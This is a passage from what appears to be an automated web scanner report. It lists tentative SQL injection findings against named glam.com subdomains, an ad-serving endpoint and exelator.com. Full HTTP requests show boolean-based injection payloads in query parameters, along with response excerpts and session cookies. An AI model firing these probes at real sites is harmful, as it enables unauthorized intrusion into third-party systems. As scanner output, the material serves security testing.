-1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_se
...[SNIP]...

1.10. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://entertainment.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13805294%20or%201%3d1--%20 and 13805294%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113805294%20or%201%3d1--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=6rm62jkempskmr3oa1e4hontq6; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:10:05 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026483796
Expires: Mon, 02 May 2011 13:10:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:10:07 GMT
Connection: close
Content-Length: 21013

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113805294%20or%201%3d2--%20 HTTP/1.1
Host: entertainment.glam.com
Proxy-Connection: keep-alive
Referer: http://entertainment.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=6rm62jkempskmr3oa1e4hontq6; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:10:09 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026483878
Expires: Mon, 02 May 2011 13:10:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:10:09 GMT
Connection: close
Content-Length: 2388

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://television.glam.com/' title='Television'>Television</a></li><li class=''><a href='http://music.glam.com/' title='Music'>Music</a></li><li class=''><a href='http://movies.glam.com/' title='Movies'>Movies</a></li><li class=''><a href='http://games.glam.com/' title='Games'>Games</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><d
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-fairfax-watoday_js&output=js&lmt=1304358325&num_ads=4'&channel=National&region=default&ad_type=text&ea=0&oe=utf8&flash=10.2.154&url=http%3A%2F%2Fwww.watoday.com.au%2Fwa-news%2Fhunger-strike-starts-on-christmas-island-20110427-1dw45.html%3Ffrom%3Dsmh_ft&adsafe=high&dt=1304358340575&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304358340600&frm=0&adk=511001906&ga_vid=1132403823.1304358341&ga_sid=1304358341&ga_hid=1598658957&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&eid=33895150&fu=0&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21455

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
ica.com/LP/0986607f354b447abb58ebd9e4ca88bf/a.aspx%3Frm_state%3Db%249ec973e97c8140bbb19f14a3efbea1fd%7Ce%240%7Cl%240%7Cu%24";
google_ad.visible_url = "www.SpringboardAmerica.com";
google_ad.line1 = "Illegal Immigrants:";
google_ad.line2 = "Should their kids become citizens?";
google_ad.line3 = "Share your opinion now!";
google_ad.regionname = "";
google_ads[11] = google_ad;
google_ad = new Object();
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-fairfax-watoday_js&output=js&lmt=1304358325&num_ads=4''&channel=National&region=default&ad_type=text&ea=0&oe=utf8&flash=10.2.154&url=http%3A%2F%2Fwww.watoday.com.au%2Fwa-news%2Fhunger-strike-starts-on-christmas-island-20110427-1dw45.html%3Ffrom%3Dsmh_ft&adsafe=high&dt=1304358340575&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304358340600&frm=0&adk=511001906&ga_vid=1132403823.1304358341&ga_sid=1304358341&ga_hid=1598658957&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&eid=33895150&fu=0&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21850

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.12. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://living.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 19754759%20or%201%3d1--%20 and 19754759%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119754759%20or%201%3d1--%20 HTTP/1.1
Host: living.glam.com
Proxy-Connection: keep-alive
Referer: http://living.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:09:26 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026482305
Expires: Mon, 02 May 2011 13:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:09:28 GMT
Connection: close
Set-Cookie: PHPSESSID=ag4hl6r1apgqihobag3hpdfk51; path=/
Content-Length: 20993

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onmou
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=119754759%20or%201%3d2--%20 HTTP/1.1
Host: living.glam.com
Proxy-Connection: keep-alive
Referer: http://living.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:09:29 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026482384
Expires: Mon, 02 May 2011 13:09:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:09:29 GMT
Connection: close
Set-Cookie: PHPSESSID=31diqlk4ss15a8tgiugnpnfui5; path=/
Content-Length: 2368

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://food.glam.com/' title='Food &amp; Recipes'>Food &amp; Recipes</a></li><li class=''><a href='http://home.glam.com/' title='Home &amp; Design'>Home &amp; Design</a></li><li class=''><a href='http://travel.glam.com/' title='Travel &amp; Leisure'>Travel &amp; Leisure</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_gl
...[SNIP]...

1.13. http://loadus.exelator.com/load/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /load/?p=229'%20and%201%3d1--%20&g=001&c=927073&ag=&gd=&search=recipes&ctg=Entertainment&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D

Response 1

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJztlL9ygzAMxt%252BFJ%252FAfiINZkpKh3BWXazgunXIZO3ds%252Bu4FG1zZSNCWtat%252F%252BmRJlr%252Bbljv98a55ppOzYGllyjvjhzzPs6R4648VK3oqdVI%252Fm%252Fbx6fXaVeeqTYqbzuQPhAxSCIQHsUZ5EiVqOUvrIVqMgPcgG8%252FBURArEWCIJIaKDZKMDR9Pl7HhnaN7ARp2FALhQaxRnkSJXurLgfe3KwGAtOdIZM74nrMIHB%252FaOZD2HEb6R%252BzCRwx6chTpqQexxj9iB%252BMVSCTwgr85BCm4aKZSYMcWs5ZU1hJRwWcW1EgcpZ85Q%252Bq0GknX6ThSp81J1tmYpXW0FKuzMdQ6Noa6hh6HpfQ16DgGzdI4LMfGMeSklmEaslBMTWIZz3IGo5JI8XAzJZ6WmxLbHabF5Yq4jOHnopmivplSJgnBzCT%252F6oi08ZEe93tLW3Ew2qhWPWmT9WxwmA1GssEvaFtYcYANH%252F3%252FPwf%252F%252BQsW6Edl; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVlEESgyAMRe%252FSEyQBG8CNx%252BjWhYvOdNfunN690FaqCVhcOCjzH%252FkfImMwEOZ7QAonAjtAh4P3nk79GCjM14B9fDqGOMDy%252BlT6LumN0FP%252F%252BVxznLE2Is6B3SodfZVWrz1dptv4mMTazixrSzspBiY%252FZyjGXpXAgl6FsN9CJDjOWBsRRxk7K03FE2E5A%252B7rVQbUB7HOELFW4t0k6AYAKjlzv8zxNentT4%252FeGyZ5kKT2QJMe0CmPdXLrUTZyK3du5ThjbUScQ3fEU2ozKP7Eer%252B3%252Bmr2P1w1u%252BQ4Y4cr4cFEuJ8IK86w6kwSn0pQ3evV2ZjcoYueGNhULylBcgbbiHRlQpPy%252BQJnqYF7; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 14:57:59 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOwzAMA%252F%252BSF5ByXNvyY4SMmTsW%252FnslBwjaJkA3AUeRt%252Bmqr11ba7lvx43%252BVFZdmAusmGA1ZJoYl74rT1olKKsBYrAUVH5o%252FIJOJWi6oQzqzcMlwEq4Br81rkNjGj88Kv%252BiV%252BNPpyiSgpJuVtMMY4Y5Fccb5iNMAg%253D%253D; expires=Tue, 30-Aug-2011 14:58:00 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 14:58:00 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

Request 2

GET /load/?p=229'%20and%201%3d2--%20&g=001&c=927073&ag=&gd=&search=recipes&ctg=Entertainment&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; 